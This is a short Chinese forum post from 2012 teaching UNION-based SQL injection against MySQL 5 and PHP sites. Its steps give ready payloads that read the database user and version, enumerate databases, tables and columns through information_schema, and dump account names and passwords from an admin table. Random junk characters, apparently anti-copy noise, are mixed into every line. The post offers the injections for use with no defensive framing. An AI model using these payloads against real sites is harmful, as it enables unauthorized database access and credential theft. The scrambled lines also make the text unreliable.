6 E7 ]% k6 v7 H4 p. w! c教程内容:Mysql 5+php 注入
! ~; Y- Q" {1 C! D: L+ E4 t" T) y7 q3 z0 E. |/ L
0 i, ]7 o2 n3 R7 _) J8 z/ l4 Z. [. p" M2 q
一.查看MYSQL基本信息(库名,版本,用户)9 v4 ^9 `& _8 Q+ o+ ], t) h% N5 ~
% O; X# |) u1 ?$ @2 W7 ]1 K7 n
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
. F, L8 Y- }! U% _
- F7 c7 Z( w) x! k2 ^二.查数据库
6 x8 G& l8 @1 d; q ]) [: Z
; {' T2 y5 Z% Q1 mand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
6 ~: [" b8 K. T+ ?# glimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。! n Z2 { m7 H1 i" Y/ H
7 l2 o) s8 q# m( Q. f6 s, M
三.暴表
2 j- |: M4 }- D# U. M% N# O0 v6 B1 B' J
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
, m" N) _9 J7 X
, o2 u* X/ k5 N7 k7 ^5 V4 C6 alimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
' O/ E* x4 b2 m- \2 m# l6 B, y5 z' N, |
四.暴字段
+ y E0 p: A& q0 p) E3 g. r( {$ _+ t" W
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*8 M2 l( g/ Z# v t w+ c! O
" F+ {0 \7 ~: I0 ]
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。2 o! k1 U( i/ C( K
1 V, ^1 X+ O' h# }五.暴数据
! g3 f' \& n2 y/ r; n
- K% f6 h8 B7 M& \5 f) y9 \$ T2 Oand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
* H9 f7 x1 x" f% Z
5 p3 u# r& O1 q4 r! @7 a: j$ b1 I% K/ Y5 u
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。 a/ u' v' O% V- h2 n0 T4 T" f
|
发表于 2012-9-13 16:27:53
收藏
支持
反对